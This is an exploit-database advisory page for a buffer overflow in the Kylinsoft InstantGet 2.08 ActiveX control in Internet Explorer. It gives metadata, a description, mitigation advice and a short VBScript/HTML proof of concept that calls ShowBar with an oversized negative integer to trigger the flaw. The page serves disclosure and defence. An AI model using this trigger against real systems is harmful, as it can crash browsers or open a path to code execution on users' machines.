header-logo
Suggest Exploit
vendor:
InstantGet
by:
SecurityFocus
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: InstantGet
Affected Version From: 02.08
Affected Version To: 02.08
Patch Exists: YES
Related CWE: N/A
CPE: 98C92840-EB1C-40BD-B6A5-395EC9CD6510
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2009

Kylinsoft InstantGet ActiveX Control Buffer Overflow Vulnerability

Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.

Mitigation:

Upgrade to the latest version of Kylinsoft InstantGet or apply the appropriate patch.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42418/info

Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.

Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.

<object classid=&#039;clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510&#039; id=&#039;target&#039; />

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language=&#039;vbscript&#039;>

arg1=-2147483647

target.ShowBar arg1 

</script>
</span></span>
</code></pre>